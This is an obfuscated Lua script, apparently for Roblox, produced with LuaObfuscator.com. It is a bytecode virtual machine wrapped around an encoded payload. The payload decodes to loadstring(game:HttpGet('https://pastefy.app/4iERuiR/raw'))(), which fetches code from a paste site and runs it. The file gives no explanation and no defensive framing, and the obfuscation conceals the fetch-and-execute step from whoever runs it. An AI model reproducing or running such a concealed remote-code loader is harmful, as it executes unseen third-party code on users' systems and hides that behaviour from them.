--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v115=0;local v116;while true do if (v115==1) then return v116;end if (v115==0) then v116=v5(v85,v19);v19=nil;v115=1;end end else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(1 + 0)) -(v32-(878 -(282 + 595)))) + (2 -(1066 -(68 + 997))))) ;return v86-(v86%(620 -(555 + 64))) ;else local v87=2^(v32-((2202 -(226 + 1044)) -(857 + 74))) ;return (((v31%(v87 + v87))>=v87) and 1) or (568 -(367 + (875 -674))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;return (v40 * 16777216) + (v39 * (66493 -(892 + 65))) + (v38 * (610 -354)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1 + 0 ,36 -16 ) * ((3 -1)^(382 -(87 + 263)))) + v41 ;local v45=v20(v42,(356 -155) -(67 + 113) ,23 + 8 );local v46=((v20(v42,32)==(1 + 0)) and  -(2 -1)) or 1 ;if (v45==((791 -(368 + 423)) + 0)) then if (v44==(0 -0)) then return v46 * (952 -(802 + 150)) ;else local v117=0;while true do if (((0 -0) -(18 -(10 + 8)))==v117) then v45=1 -0 ;v43=0 + 0 ;break;end end end elseif (v45==(3044 -(915 + (315 -233)))) then return ((v44==(0 -0)) and (v46 * (((443 -(416 + 26)) + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((1189 -(1069 + 118))^(117 -65)))) ;end local function v25(v47) local v48=0 + 0 ;local v49;local v50;while true do if (v48==(9 -6)) then return v6(v50);end if (v48==(1138 -(116 + 1022))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=(1 + 0) -0 ;end if (v48==2) then v50={};for v118=439 -(145 + 104 + 189) , #v49 do v50[v118]=v2(v1(v3(v49,v118,v118)));end v48=433 -(44 + 386) ;end if (v48==(1487 -(998 + 488))) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=4 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v88,v89,v90,v91,v92,v93,v94,v95) local v88=(function() return 1707 -(856 + 851) ;end)();local v89=(function() return;end)();local v90=(function() return;end)();while true do if ( #"!"==v88) then if (v89== #",") then v90=(function() return v91()~=0 ;end)();elseif (v89==(4 -2)) then v90=(function() return v92();end)();elseif (v89== #"asd") then v90=(function() return v93();end)();end v94[v95]=(function() return v90;end)();break;end if (v88==(1763 -(454 + 1309))) then local v125=(function() return 290 -(60 + 230) ;end)();local v126=(function() return;end)();while true do if (v125~=(0 + 0)) then else v126=(function() return 0 -0 ;end)();while true do if (v126~=(0 + 0)) then else v89=(function() return v91();end)();v90=(function() return nil;end)();v126=(function() return 1 -0 ;end)();end if ((812 -(569 + 242))~=v126) then else v88=(function() return  #"}";end)();break;end end break;end end end end return v88,v89,v90,v91,v92,v93,v94,v95;end;end)();local v52=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103,v104) local v105=(function() return 0 -0 ;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do local v114=(function() return 0;end)();while true do if (v114==(285 -(134 + 151))) then if (v105~=(1666 -(970 + 695))) then else local v127=(function() return 0 -0 ;end)();while true do if (v127~=(0 + 0)) then else local v151=(function() return 1990 -(582 + 1408) ;end)();while true do if ((1251 -(721 + 530))==v151) then while true do if (v96==(0 -0)) then v97=(function() return v98();end)();if (v99(v97, #"~", #".")==0) then local v188=(function() return 0;end)();local v189=(function() return;end)();local v190=(function() return;end)();local v191=(function() return;end)();while true do if (v188~=(0 -0)) then else local v192=(function() return 0 -0 ;end)();local v193=(function() return;end)();while true do if (v192~=(0 -0)) then else v193=(function() return 0;end)();while true do if ((1824 -(1195 + 629))==v193) then v189=(function() return v99(v97,2 -0 , #"asd");end)();v190=(function() return v99(v97, #".dev",6 + 0 );end)();v193=(function() return 1501 -(1408 + 92) ;end)();end if (v193~=1) then else v188=(function() return 242 -(187 + 54) ;end)();break;end end break;end end end if ((781 -(162 + 618))~=v188) then else local v194=(function() return 1086 -(461 + 625) ;end)();while true do if (v194==(1 + 0)) then v188=(function() return 2 + 0 ;end)();break;end if (v194==(0 -0)) then v191=(function() return {v100(),v100(),nil,nil};end)();if (v189==(0 -0)) then local v199=(function() return 0 + 0 ;end)();local v200=(function() return;end)();while true do if (v199==(1636 -(1373 + 263))) then v200=(function() return 0;end)();while true do if (v200~=(0 + 0)) then else v191[ #"91("]=(function() return v100();end)();v191[ #"?id="]=(function() return v100();end)();break;end end break;end end elseif (v189== #"[") then v191[ #"19("]=(function() return v101();end)();elseif (v189==(1002 -(451 + 549))) then v191[ #"xxx"]=(function() return v101() -((1 + 1)^16) ;end)();elseif (v189== #"xnx") then local v205=(function() return 529 -(406 + 123) ;end)();local v206=(function() return;end)();while true do if (v205~=(0 + 0)) then else v206=(function() return 0 -0 ;end)();while true do if (v206==0) then v191[ #"-19"]=(function() return v101() -((1771 -(1749 + 20))^(26 -10)) ;end)();v191[ #"0836"]=(function() return v100();end)();break;end end break;end end end v194=(function() return 1385 -(746 + 638) ;end)();end end end if (v188==(2 + 1)) then if (v99(v190, #"xxx", #"xnx")~= #"/") then else v191[ #"0836"]=(function() return v102[v191[ #"?id="]];end)();end v103[v104]=(function() return v191;end)();break;end if (v188==(2 -0)) then if (v99(v190, #"{", #"}")== #",") then v191[2]=(function() return v102[v191[2]];end)();end if (v99(v190,1324 -(1249 + 73) ,2)== #"\\") then v191[ #"19("]=(function() return v102[v191[ #"19("]];end)();end v188=(function() return 344 -(218 + 123) ;end)();end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end end end end end if (v105==(1581 -(1535 + 46))) then local v128=(function() return 0 + 0 ;end)();while true do if (v128==(1 + 0)) then v105=(function() return 561 -(306 + 254) ;end)();break;end if (v128==0) then v96=(function() return 0 + 0 ;end)();v97=(function() return nil;end)();v128=(function() return 1;end)();end end end break;end end end end;end)();local v53=(function() return function(v106,v107,v108) local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();while true do if (0==v109) then v110=(function() return 1900 -(106 + 1794) ;end)();while true do if (v110~=(0 + 0)) then else local v129=(function() return 0 + 0 ;end)();local v130=(function() return;end)();while true do if ((0 -0)==v129) then v130=(function() return 0;end)();while true do if (v130~=(1467 -(899 + 568))) then else v106[v107-#"!" ]=(function() return v108();end)();return v106,v107,v108;end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #" ",v58 do FlatIdent_2D88C,Type,Cons,v21,v24,v25,v59,v67=(function() return v51(FlatIdent_2D88C,Type,Cons,v21,v24,v25,v59,v67);end)();end v57[ #"-19"]=(function() return v21();end)();for v68= #",",v23() do FlatIdent_5346B,Descriptor,v21,v20,v22,v23,v59,v54,v68=(function() return v52(FlatIdent_5346B,Descriptor,v21,v20,v22,v23,v59,v54,v68);end)();end for v69= #"\\",v23() do v55,v69,v28=(function() return v53(v55,v69,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[116 -(4 + 110) ];local v66=v61[(2207 -1620) -(57 + 527) ];return function(...) local v70=v64;local v71=v65;local v72=v66;local v73=v27;local v74=1428 -(41 + 1386) ;local v75= -(104 -((233 -(42 + 174)) + 86));local v76={};local v77={...};local v78=v12("#",...) -((1662 -(1477 + 184)) -0) ;local v79={};local v80={};for v111=0 -0 ,v78 do if (v111>=v72) then v76[v111-v72 ]=v77[v111 + (167 -(122 + (59 -15))) ];else v80[v111]=v77[v111 + (1 -0) ];end end local v81=(v78-v72) + 1 + 0 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if ((3417<=3829) and (v83<=((865 -(564 + 292)) -6))) then if ((v83<=(1 + 0)) or (4947<2722)) then if ((2408<=4457) and (v83==0)) then local v131=0 + 0 ;local v132;while true do if ((v131==((0 -0) + 0)) or (2851<1455)) then v132=v82[2];v80[v132]=v80[v132](v13(v80,v132 + (1 -(0 + 0)) ,v75));break;end end else local v133=65 -(30 + 35) ;local v134;local v135;local v136;local v137;while true do if (v133==1) then v75=(v136 + v134) -(1 + 0) ;v137=(3788 -2531) -(1043 + 214) ;v133=7 -5 ;end if ((((515 + 697) -(323 + 889))==v133) or (443==636)) then v134=v82[5 -(3 + 0) ];v135,v136=v73(v80[v134](v13(v80,v134 + ((2085 -(363 + 1141)) -(361 + 219)) ,v82[323 -(53 + 267) ])));v133=1 + (476 -(41 + 435)) ;end if ((4061>=280) and (v133==((1995 -(1183 + 397)) -(15 + (1399 -(938 + 63)))))) then for v181=v134,v75 do v137=v137 + (983 -(18 + 964)) ;v80[v181]=v135[v137];end break;end end end elseif (v83>(7 -5)) then v80[v82[2 + 0 ]]=v63[v82[2 + 1 + 0 ]];else local v140=850 -(20 + 830) ;local v141;local v142;while true do if ((1 + 0)==v140) then v80[v141 + (127 -(116 + (30 -20))) ]=v142;v80[v141]=v142[v82[1 + 3 ]];break;end if (v140==0) then v141=v82[740 -((1667 -(936 + 189)) + 196) ];v142=v80[v82[6 -(3 + 0) ]];v140=1 + 0 ;end end end elseif (v83<=(3 + 2)) then if ((v83>4) or (1513>1590)) then v80[v82[2]]();else v80[v82[1 + 0 + 1 ]]=v82[7 -(3 + 1) ];end elseif (v83==(15 -9)) then do return;end else local v145=1551 -(1126 + (2038 -(1565 + 48))) ;local v146;local v147;local v148;local v149;local v150;while true do if ((v145==(410 -(118 + 287))) or (2166<1293)) then v147,v148=v73(v80[v150](v13(v80,v150 + (3 -2) ,v82[1124 -(118 + (2978 -(1913 + 62))) ])));v75=(v148 + v150) -(2 -(1 + 0)) ;v146=377 -(90 + 52 + 235) ;for v184=v150,v75 do v146=v146 + 1 ;v80[v184]=v147[v146];end v145=27 -(1159 -(782 + 356)) ;end if (v145==(1 + 0)) then v80[v82[979 -(553 + 424) ]]=v63[v82[3]];v74=v74 + (1 -0) ;v82=v70[v74];v80[v82[2 + 0 ]]=v63[v82[7 -4 ]];v145=2 + (267 -(176 + 91)) ;end if (v145==(5 + 2)) then v74=v74 + 1 ;v82=v70[v74];v80[v82[1 + 1 ]]();v74=v74 + 1 + (0 -0) ;v145=17 -9 ;end if (v145==(0 -0)) then v146=nil;v147,v148=nil;v149=nil;v150=nil;v145=1;end if (v145==(5 -1)) then v80[v82[4 -2 ]]=v82[1 + (1094 -(975 + 117)) ];v74=v74 + (4 -3) ;v82=v70[v74];v150=v82[755 -(239 + (2447 -(565 + 1368))) ];v145=(1877 -(157 + 1718)) + 3 ;end if ((1332 -(797 + 532))==v145) then v80[v150 + 1 ]=v149;v80[v150]=v149[v82[3 + 1 ]];v74=v74 + 1 + 0 + 0 ;v82=v70[v74];v145=4;end if (v145==(13 -7)) then v74=v74 + (1203 -(373 + 829)) ;v82=v70[v74];v150=v82[(2602 -1869) -(476 + 255) ];v80[v150]=v80[v150](v13(v80,v150 + (1131 -(369 + 761)) ,v75));v145=5 + 2 ;end if (v145==((6 -4) -0)) then v74=v74 + (1 -0) ;v82=v70[v74];v150=v82[240 -(64 + 174) ];v149=v80[v82[1 + 2 ]];v145=3 -0 ;end if (v145==(344 -(144 + 192))) then v82=v70[v74];do return;end break;end end end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F34692Q45527569522F72617700083Q0012073Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
